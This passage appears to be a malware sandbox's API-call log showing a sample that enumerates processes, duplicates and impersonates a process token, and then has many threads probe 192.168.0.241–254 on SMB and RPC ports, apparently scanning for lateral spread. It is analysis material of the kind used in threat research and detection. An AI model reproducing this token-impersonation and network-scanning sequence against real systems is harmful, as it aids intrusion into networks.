Process32Next (in: hSnapshot=0x3a8, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.883] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x370) returned 0x3ac [0076.883] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x3b0) returned 1 [0076.883] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0076.883] CloseHandle (hObject=0x3b0) returned 1 [0076.883] CloseHandle (hObject=0x3ac) returned 1 [0076.883] Process32Next (in: hSnapshot=0x3a8, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0076.884] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x3ac) returned 0x3ac [0076.884] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x0) returned 0 [0076.884] CloseHandle (hObject=0x3ac) returned 1 [0076.884] Process32Next (in: hSnapshot=0x3a8, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.885] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0xc8) returned 0x3ac [0076.885] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x0) returned 0 [0076.885] CloseHandle (hObject=0x3ac) returned 1 [0076.885] Process32Next (in: hSnapshot=0x3a8, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.886] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x11c) returned 0x3ac [0076.886] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x0) returned 0 [0076.886] CloseHandle (hObject=0x3ac) returned 1 [0076.886] Process32Next (in: hSnapshot=0x3a8, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0076.887] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x444) returned 0x3ac [0076.887] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x3b0) returned 1 [0076.887] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0076.887] DuplicateToken (in: ExistingTokenHandle=0x3b0, ImpersonationLevel=0x2, DuplicateTokenHandle=0x219fdd0 | out: DuplicateTokenHandle=0x219fdd0*=0x3b4) returned 1 [0076.887] SetThreadToken (Thread=0x0, Token=0x3b4) returned 1 [0076.887] CloseHandle (hObject=0x3b4) returned 1 [0076.887] CloseHandle (hObject=0x3b0) returned 1 [0076.887] CloseHandle (hObject=0x3ac) returned 1 [0076.887] CloseHandle (hObject=0x3a8) returned 1 [0076.887] lstrcmpiW (lpString1="C:\\", lpString2="Microsoft Terminal Services") returned -1 [0076.888] wsprintfW (in: param_1=0x219fb18, param_2="%s\\*" | out: param_1="Microsoft Terminal Services\\*") returned 29 [0076.888] FindFirstFileExW (in: lpFileName="Microsoft Terminal Services\\*", fInfoLevelId=0x0, lpFindFileData=0x219fd28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x219fd28) returned 0xffffffff [0076.888] RtlExitUserThread (Status=0x0) Thread: id = 59 os_tid = 0x310 [0090.044] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1e78 [0090.044] free (_Block=0x1fb1e78) [0090.044] inet_addr (cp="192.168.0.254") returned 0xfe00a8c0 [0090.045] htons (hostshort=0x1bd) returned 0xbd01 [0090.045] socket (af=2, type=1, protocol=6) returned 0x9bc [0091.032] ioctlsocket (in: s=0x9bc, cmd=-2147195266, argp=0x219ff34 | out: argp=0x219ff34) returned 0 [0091.032] connect (s=0x9bc, name=0x219ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.254"), namelen=16) returned -1 [0091.033] WSAGetLastError () returned 10035 [0091.033] select (in: nfds=0, readfds=0x0, writefds=0x219fd08, exceptfds=0x219fe10, timeout=0x219ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x219fd08, exceptfds=0x219fe10) returned 0 [0096.077] closesocket (s=0x9bc) returned 0 [0096.078] inet_addr (cp="192.168.0.254") returned 0xfe00a8c0 [0096.078] htons (hostshort=0x87) returned 0x8700 [0096.078] socket (af=2, type=1, protocol=6) returned 0x9bc [0096.078] ioctlsocket (in: s=0x9bc, cmd=-2147195266, argp=0x219ff34 | out: argp=0x219ff34) returned 0 [0096.078] connect (s=0x9bc, name=0x219ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.254"), namelen=16) returned -1 [0096.078] WSAGetLastError () returned 10035 [0096.078] select (in: nfds=0, readfds=0x0, writefds=0x219fd08, exceptfds=0x219fe10, timeout=0x219ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x219fd08, exceptfds=0x219fe10) returned 0 [0101.129] closesocket (s=0x9bc) returned 0 [0101.129] RtlExitUserThread (Status=0x0) Thread: id = 60 os_tid = 0x314 [0090.856] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1e50 [0090.856] free (_Block=0x1fb1e50) [0090.856] inet_addr (cp="192.168.0.253") returned 0xfd00a8c0 [0090.856] htons (hostshort=0x1bd) returned 0xbd01 [0090.856] socket (af=2, type=1, protocol=6) returned 0x7f4 [0090.964] ioctlsocket (in: s=0x7f4, cmd=-2147195266, argp=0x40aff34 | out: argp=0x40aff34) returned 0 [0090.964] connect (s=0x7f4, name=0x40aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.253"), namelen=16) returned -1 [0090.968] WSAGetLastError () returned 10035 [0090.968] select (in: nfds=0, readfds=0x0, writefds=0x40afd08, exceptfds=0x40afe10, timeout=0x40aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x40afd08, exceptfds=0x40afe10) returned 0 [0095.963] closesocket (s=0x7f4) returned 0 [0095.964] inet_addr (cp="192.168.0.253") returned 0xfd00a8c0 [0095.964] htons (hostshort=0x87) returned 0x8700 [0095.964] socket (af=2, type=1, protocol=6) returned 0x7f4 [0095.964] ioctlsocket (in: s=0x7f4, cmd=-2147195266, argp=0x40aff34 | out: argp=0x40aff34) returned 0 [0095.964] connect (s=0x7f4, name=0x40aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.253"), namelen=16) returned -1 [0095.965] WSAGetLastError () returned 10035 [0095.965] select (in: nfds=0, readfds=0x0, writefds=0x40afd08, exceptfds=0x40afe10, timeout=0x40aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x40afd08, exceptfds=0x40afe10) returned 0 [0101.009] closesocket (s=0x7f4) returned 0 [0101.010] RtlExitUserThread (Status=0x0) Thread: id = 61 os_tid = 0x23c [0090.856] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1e28 [0090.856] free (_Block=0x1fb1e28) [0090.857] inet_addr (cp="192.168.0.252") returned 0xfc00a8c0 [0090.857] htons (hostshort=0x1bd) returned 0xbd01 [0090.857] socket (af=2, type=1, protocol=6) returned 0x868 [0090.979] ioctlsocket (in: s=0x868, cmd=-2147195266, argp=0x41eff34 | out: argp=0x41eff34) returned 0 [0090.980] connect (s=0x868, name=0x41eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.252"), namelen=16) returned -1 [0090.980] WSAGetLastError () returned 10035 [0090.980] select (in: nfds=0, readfds=0x0, writefds=0x41efd08, exceptfds=0x41efe10, timeout=0x41eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x41efd08, exceptfds=0x41efe10) returned 0 [0095.984] closesocket (s=0x868) returned 0 [0095.985] inet_addr (cp="192.168.0.252") returned 0xfc00a8c0 [0095.985] htons (hostshort=0x87) returned 0x8700 [0095.985] socket (af=2, type=1, protocol=6) returned 0x868 [0095.985] ioctlsocket (in: s=0x868, cmd=-2147195266, argp=0x41eff34 | out: argp=0x41eff34) returned 0 [0095.985] connect (s=0x868, name=0x41eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.252"), namelen=16) returned -1 [0095.985] WSAGetLastError () returned 10035 [0095.986] select (in: nfds=0, readfds=0x0, writefds=0x41efd08, exceptfds=0x41efe10, timeout=0x41eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x41efd08, exceptfds=0x41efe10) returned 0 [0101.031] closesocket (s=0x868) returned 0 [0101.032] RtlExitUserThread (Status=0x0) Thread: id = 62 os_tid = 0x270 [0090.857] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1e00 [0090.857] free (_Block=0x1fb1e00) [0090.857] inet_addr (cp="192.168.0.251") returned 0xfb00a8c0 [0090.857] htons (hostshort=0x1bd) returned 0xbd01 [0090.857] socket (af=2, type=1, protocol=6) returned 0x82c [0090.970] ioctlsocket (in: s=0x82c, cmd=-2147195266, argp=0x432ff34 | out: argp=0x432ff34) returned 0 [0090.970] connect (s=0x82c, name=0x432ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.251"), namelen=16) returned -1 [0090.971] WSAGetLastError () returned 10035 [0090.971] select (in: nfds=0, readfds=0x0, writefds=0x432fd08, exceptfds=0x432fe10, timeout=0x432ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x432fd08, exceptfds=0x432fe10) returned 0 [0095.997] closesocket (s=0x82c) returned 0 [0095.998] inet_addr (cp="192.168.0.251") returned 0xfb00a8c0 [0095.998] htons (hostshort=0x87) returned 0x8700 [0095.998] socket (af=2, type=1, protocol=6) returned 0x82c [0095.998] ioctlsocket (in: s=0x82c, cmd=-2147195266, argp=0x432ff34 | out: argp=0x432ff34) returned 0 [0095.998] connect (s=0x82c, name=0x432ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.251"), namelen=16) returned -1 [0095.998] WSAGetLastError () returned 10035 [0095.998] select (in: nfds=0, readfds=0x0, writefds=0x432fd08, exceptfds=0x432fe10, timeout=0x432ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x432fd08, exceptfds=0x432fe10) returned 0 [0101.056] closesocket (s=0x82c) returned 0 [0101.057] RtlExitUserThread (Status=0x0) Thread: id = 63 os_tid = 0x344 [0090.857] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1dd8 [0090.857] free (_Block=0x1fb1dd8) [0090.857] inet_addr (cp="192.168.0.250") returned 0xfa00a8c0 [0090.857] htons (hostshort=0x1bd) returned 0xbd01 [0090.857] socket (af=2, type=1, protocol=6) returned 0x838 [0090.972] ioctlsocket (in: s=0x838, cmd=-2147195266, argp=0x446ff34 | out: argp=0x446ff34) returned 0 [0090.972] connect (s=0x838, name=0x446ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.250"), namelen=16) returned -1 [0090.973] WSAGetLastError () returned 10035 [0090.973] select (in: nfds=0, readfds=0x0, writefds=0x446fd08, exceptfds=0x446fe10, timeout=0x446ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x446fd08, exceptfds=0x446fe10) returned 0 [0095.995] closesocket (s=0x838) returned 0 [0095.995] inet_addr (cp="192.168.0.250") returned 0xfa00a8c0 [0095.995] htons (hostshort=0x87) returned 0x8700 [0095.995] socket (af=2, type=1, protocol=6) returned 0x838 [0095.996] ioctlsocket (in: s=0x838, cmd=-2147195266, argp=0x446ff34 | out: argp=0x446ff34) returned 0 [0095.996] connect (s=0x838, name=0x446ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.250"), namelen=16) returned -1 [0095.996] WSAGetLastError () returned 10035 [0095.996] select (in: nfds=0, readfds=0x0, writefds=0x446fd08, exceptfds=0x446fe10, timeout=0x446ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x446fd08, exceptfds=0x446fe10) returned 0 [0101.054] closesocket (s=0x838) returned 0 [0101.054] RtlExitUserThread (Status=0x0) Thread: id = 64 os_tid = 0x5dc [0090.858] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1db0 [0090.858] free (_Block=0x1fb1db0) [0090.858] inet_addr (cp="192.168.0.249") returned 0xf900a8c0 [0090.858] htons (hostshort=0x1bd) returned 0xbd01 [0090.858] socket (af=2, type=1, protocol=6) returned 0x844 [0090.975] ioctlsocket (in: s=0x844, cmd=-2147195266, argp=0x45aff34 | out: argp=0x45aff34) returned 0 [0090.975] connect (s=0x844, name=0x45aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.249"), namelen=16) returned -1 [0090.975] WSAGetLastError () returned 10035 [0090.975] select (in: nfds=0, readfds=0x0, writefds=0x45afd08, exceptfds=0x45afe10, timeout=0x45aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x45afd08, exceptfds=0x45afe10) returned 0 [0095.992] closesocket (s=0x844) returned 0 [0095.992] inet_addr (cp="192.168.0.249") returned 0xf900a8c0 [0095.992] htons (hostshort=0x87) returned 0x8700 [0095.992] socket (af=2, type=1, protocol=6) returned 0x844 [0095.993] ioctlsocket (in: s=0x844, cmd=-2147195266, argp=0x45aff34 | out: argp=0x45aff34) returned 0 [0095.993] connect (s=0x844, name=0x45aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.249"), namelen=16) returned -1 [0095.993] WSAGetLastError () returned 10035 [0095.993] select (in: nfds=0, readfds=0x0, writefds=0x45afd08, exceptfds=0x45afe10, timeout=0x45aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x45afd08, exceptfds=0x45afe10) returned 0 [0101.051] closesocket (s=0x844) returned 0 [0101.051] RtlExitUserThread (Status=0x0) Thread: id = 65 os_tid = 0x7e8 [0090.858] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1d88 [0090.858] free (_Block=0x1fb1d88) [0090.858] inet_addr (cp="192.168.0.248") returned 0xf800a8c0 [0090.858] htons (hostshort=0x1bd) returned 0xbd01 [0090.858] socket (af=2, type=1, protocol=6) returned 0x850 [0090.976] ioctlsocket (in: s=0x850, cmd=-2147195266, argp=0x46eff34 | out: argp=0x46eff34) returned 0 [0090.976] connect (s=0x850, name=0x46eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.248"), namelen=16) returned -1 [0090.977] WSAGetLastError () returned 10035 [0090.977] select (in: nfds=0, readfds=0x0, writefds=0x46efd08, exceptfds=0x46efe10, timeout=0x46eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x46efd08, exceptfds=0x46efe10) returned 0 [0095.989] closesocket (s=0x850) returned 0 [0095.990] inet_addr (cp="192.168.0.248") returned 0xf800a8c0 [0095.990] htons (hostshort=0x87) returned 0x8700 [0095.990] socket (af=2, type=1, protocol=6) returned 0x850 [0095.990] ioctlsocket (in: s=0x850, cmd=-2147195266, argp=0x46eff34 | out: argp=0x46eff34) returned 0 [0095.990] connect (s=0x850, name=0x46eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.248"), namelen=16) returned -1 [0095.990] WSAGetLastError () returned 10035 [0095.991] select (in: nfds=0, readfds=0x0, writefds=0x46efd08, exceptfds=0x46efe10, timeout=0x46eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x46efd08, exceptfds=0x46efe10) returned 0 [0101.037] closesocket (s=0x850) returned 0 [0101.038] RtlExitUserThread (Status=0x0) Thread: id = 66 os_tid = 0x6c8 [0090.859] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1d60 [0090.859] free (_Block=0x1fb1d60) [0090.859] inet_addr (cp="192.168.0.247") returned 0xf700a8c0 [0090.859] htons (hostshort=0x1bd) returned 0xbd01 [0090.859] socket (af=2, type=1, protocol=6) returned 0x85c [0090.978] ioctlsocket (in: s=0x85c, cmd=-2147195266, argp=0x482ff34 | out: argp=0x482ff34) returned 0 [0090.978] connect (s=0x85c, name=0x482ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.247"), namelen=16) returned -1 [0090.978] WSAGetLastError () returned 10035 [0090.979] select (in: nfds=0, readfds=0x0, writefds=0x482fd08, exceptfds=0x482fe10, timeout=0x482ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x482fd08, exceptfds=0x482fe10) returned 0 [0095.987] closesocket (s=0x85c) returned 0 [0095.987] inet_addr (cp="192.168.0.247") returned 0xf700a8c0 [0095.987] htons (hostshort=0x87) returned 0x8700 [0095.988] socket (af=2, type=1, protocol=6) returned 0x85c [0095.988] ioctlsocket (in: s=0x85c, cmd=-2147195266, argp=0x482ff34 | out: argp=0x482ff34) returned 0 [0095.988] connect (s=0x85c, name=0x482ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.247"), namelen=16) returned -1 [0095.988] WSAGetLastError () returned 10035 [0095.988] select (in: nfds=0, readfds=0x0, writefds=0x482fd08, exceptfds=0x482fe10, timeout=0x482ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x482fd08, exceptfds=0x482fe10) returned 0 [0101.034] closesocket (s=0x85c) returned 0 [0101.035] RtlExitUserThread (Status=0x0) Thread: id = 67 os_tid = 0x7a4 [0090.859] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1d38 [0090.859] free (_Block=0x1fb1d38) [0090.859] inet_addr (cp="192.168.0.246") returned 0xf600a8c0 [0090.859] htons (hostshort=0x1bd) returned 0xbd01 [0090.859] socket (af=2, type=1, protocol=6) returned 0x828 [0090.968] ioctlsocket (in: s=0x828, cmd=-2147195266, argp=0x496ff34 | out: argp=0x496ff34) returned 0 [0090.968] connect (s=0x828, name=0x496ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.246"), namelen=16) returned -1 [0090.969] WSAGetLastError () returned 10035 [0090.969] select (in: nfds=0, readfds=0x0, writefds=0x496fd08, exceptfds=0x496fe10, timeout=0x496ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x496fd08, exceptfds=0x496fe10) returned 0 [0095.965] closesocket (s=0x828) returned 0 [0095.965] inet_addr (cp="192.168.0.246") returned 0xf600a8c0 [0095.965] htons (hostshort=0x87) returned 0x8700 [0095.965] socket (af=2, type=1, protocol=6) returned 0x828 [0095.966] ioctlsocket (in: s=0x828, cmd=-2147195266, argp=0x496ff34 | out: argp=0x496ff34) returned 0 [0095.966] connect (s=0x828, name=0x496ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.246"), namelen=16) returned -1 [0095.966] WSAGetLastError () returned 10035 [0095.966] select (in: nfds=0, readfds=0x0, writefds=0x496fd08, exceptfds=0x496fe10, timeout=0x496ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x496fd08, exceptfds=0x496fe10) returned 0 [0101.012] closesocket (s=0x828) returned 0 [0101.013] RtlExitUserThread (Status=0x0) Thread: id = 68 os_tid = 0x3a4 [0090.859] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1d10 [0090.859] free (_Block=0x1fb1d10) [0090.860] inet_addr (cp="192.168.0.245") returned 0xf500a8c0 [0090.860] htons (hostshort=0x1bd) returned 0xbd01 [0090.860] socket (af=2, type=1, protocol=6) returned 0x834 [0090.971] ioctlsocket (in: s=0x834, cmd=-2147195266, argp=0x4aaff34 | out: argp=0x4aaff34) returned 0 [0090.971] connect (s=0x834, name=0x4aaff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.245"), namelen=16) returned -1 [0090.972] WSAGetLastError () returned 10035 [0090.972] select (in: nfds=0, readfds=0x0, writefds=0x4aafd08, exceptfds=0x4aafe10, timeout=0x4aaff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x4aafd08, exceptfds=0x4aafe10) returned 0 [0095.996] closesocket (s=0x834) returned 0 [0095.997] inet_addr (cp="192.168.0.245") returned 0xf500a8c0 [0095.997] htons (hostshort=0x87) returned 0x8700 [0095.997] socket (af=2, type=1, protocol=6) returned 0x834 [0095.997] ioctlsocket (in: s=0x834, cmd=-2147195266, argp=0x4aaff34 | out: argp=0x4aaff34) returned 0 [0095.997] connect (s=0x834, name=0x4aaff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.245"), namelen=16) returned -1 [0095.997] WSAGetLastError () returned 10035 [0095.997] select (in: nfds=0, readfds=0x0, writefds=0x4aafd08, exceptfds=0x4aafe10, timeout=0x4aaff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x4aafd08, exceptfds=0x4aafe10) returned 0 [0101.055] closesocket (s=0x834) returned 0 [0101.056] RtlExitUserThread (Status=0x0) Thread: id = 69 os_tid = 0x810 [0090.860] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1ce8 [0090.860] free (_Block=0x1fb1ce8) [0090.860] inet_addr (cp="192.168.0.244") returned 0xf400a8c0 [0090.860] htons (hostshort=0x1bd) returned 0xbd01 [0090.860] socket (af=2, type=1, protocol=6) returned 0x840 [0090.973] ioctlsocket (in: s=0x840, cmd=-2147195266, argp=0x4beff34 | out: argp=0x4beff34) returned 0 [0090.973] connect (s=0x840, name=0x4beff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.244"), namelen=16) returned -1 [0090.975] WSAGetLastError () returned 10035 [0090.975] select (in: nfds=0, readfds=0x0, writefds=0x4befd08, exceptfds=0x4befe10, timeout=0x4beff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x4befd08, exceptfds=0x4befe10) returned 0 [0095.993] closesocket (s=0x840) returned 0 [0095.994] inet_addr (cp="192.168.0.244") returned 0xf400a8c0 [0095.994] htons (hostshort=0x87) returned 0x8700 [0095.994] socket (af=2, type=1, protocol=6) returned 0x840 [0095.994] ioctlsocket (in: s=0x840, cmd=-2147195266, argp=0x4beff34 | out: argp=0x4beff34) returned 0 [0095.994] connect (s=0x840, name=0x4beff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.244"), namelen=16) returned -1 [0095.994] WSAGetLastError () returned 10035 [0095.995] select (in: nfds=0, readfds=0x0, writefds=0x4befd08, exceptfds=0x4befe10, timeout=0x4beff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x4befd08, exceptfds=0x4befe10) returned 0 [0101.052] closesocket (s=0x840) returned 0 [0101.053] RtlExitUserThread (Status=0x0) Thread: id = 70 os_tid = 0x8b8 [0090.860] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1cc0 [0090.860] free (_Block=0x1fb1cc0) [0090.860] inet_addr (cp="192.168.0.243") returned 0xf300a8c0 [0090.860] htons (hostshort=0x1bd) returned 0xbd01 [0090.861] socket (af=2, type=1, protocol=6) returned 0x84c [0090.976] ioctlsocket (in: s=0x84c, cmd=-2147195266, argp=0x4d2ff34 | out: argp=0x4d2ff34) returned 0 [0090.976] connect (s=0x84c, name=0x4d2ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.243"), namelen=16) returned -1 [0090.976] WSAGetLastError () returned 10035 [0090.976] select (in: nfds=0, readfds=0x0, writefds=0x4d2fd08, exceptfds=0x4d2fe10, timeout=0x4d2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x4d2fd08, exceptfds=0x4d2fe10) returned 0 [0095.991] closesocket (s=0x84c) returned 0 [0095.991] inet_addr (cp="192.168.0.243") returned 0xf300a8c0 [0095.991] htons (hostshort=0x87) returned 0x8700 [0095.991] socket (af=2, type=1, protocol=6) returned 0x84c [0095.991] ioctlsocket (in: s=0x84c, cmd=-2147195266, argp=0x4d2ff34 | out: argp=0x4d2ff34) returned 0 [0095.991] connect (s=0x84c, name=0x4d2ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.243"), namelen=16) returned -1 [0095.992] WSAGetLastError () returned 10035 [0095.992] select (in: nfds=0, readfds=0x0, writefds=0x4d2fd08, exceptfds=0x4d2fe10, timeout=0x4d2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x4d2fd08, exceptfds=0x4d2fe10) returned 0 [0101.039] closesocket (s=0x84c) returned 0 [0101.040] RtlExitUserThread (Status=0x0) Thread: id = 71 os_tid = 0x8d8 [0090.861] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1c98 [0090.861] free (_Block=0x1fb1c98) [0090.861] inet_addr (cp="192.168.0.242") returned 0xf200a8c0 [0090.861] htons (hostshort=0x1bd) returned 0xbd01 [0090.861] socket (af=2, type=1, protocol=6) returned 0x858 [0090.977] ioctlsocket (in: s=0x858, cmd=-2147195266, argp=0x4e6ff34 | out: argp=0x4e6ff34) returned 0 [0090.977] connect (s=0x858, name=0x4e6ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.242"), namelen=16) returned -1 [0090.978] WSAGetLastError () returned 10035 [0090.978] select (in: nfds=0, readfds=0x0, writefds=0x4e6fd08, exceptfds=0x4e6fe10, timeout=0x4e6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x4e6fd08, exceptfds=0x4e6fe10) returned 0 [0095.988] closesocket (s=0x858) returned 0 [0095.989] inet_addr (cp="192.168.0.242") returned 0xf200a8c0 [0095.989] htons (hostshort=0x87) returned 0x8700 [0095.989] socket (af=2, type=1, protocol=6) returned 0x858 [0095.989] ioctlsocket (in: s=0x858, cmd=-2147195266, argp=0x4e6ff34 | out: argp=0x4e6ff34) returned 0 [0095.989] connect (s=0x858, name=0x4e6ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.242"), namelen=16) returned -1 [0095.989] WSAGetLastError () returned 10035 [0095.989] select (in: nfds=0, readfds=0x0, writefds=0x4e6fd08, exceptfds=0x4e6fe10, timeout=0x4e6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x4e6fd08, exceptfds=0x4e6fe10) returned 0 [0101.036] closesocket (s=0x858) returned 0 [0101.036] RtlExitUserThread (Status=0x0) Thread: id = 72 os_tid = 0x830 [0090.861] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x1fb1c70 [0090.861] free (_Block=0x1fb1c70) [0090.861] inet_addr (cp="192.168.0.241") returned 0xf100a8c0 [0090.861] htons (hostshort=0x1bd) returned 0xbd01 [0090.861] socket (af=2, type=1, protocol=6) returned 0x864 [0090.979] ioctlsocket (in: s=0x864, cmd=-2147195266, argp=0x4faff34 | out: argp=0x4faff34) returned 0 [0090.979] connect (s=0x864, name=0x4faff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.241"), namelen=16) returned -1 [0090.979] WSAGetLastError () returned 10035 [0090.979] select (in: nfds=0, readfds=0x0, writefds=0x4fafd08, exceptfds=0x4fafe10, timeout=0x4faff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x4fafd08, exceptfds=0x4fafe10) returned 0 [0095.986] closesocket (s=0x864) returned 0 [0095.986] inet_addr (cp="192.168.0.241") returned 0xf100a8c0 [0095.986] htons (hostshort=0x87) returned 0x8700 [0095.986] socket (af=2, type=1, protocol=6) returned 0x864 [0095.986] ioctlsocket (in: s=0x864, cmd=-2147195266, argp=0x4faff34 | out: argp=0x4faff34) returned 0 [0095.987] connect (s=0x864, name=0x4faff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.241"), namelen=16) returned -1 [0095.987] WSAGetLastError () returned 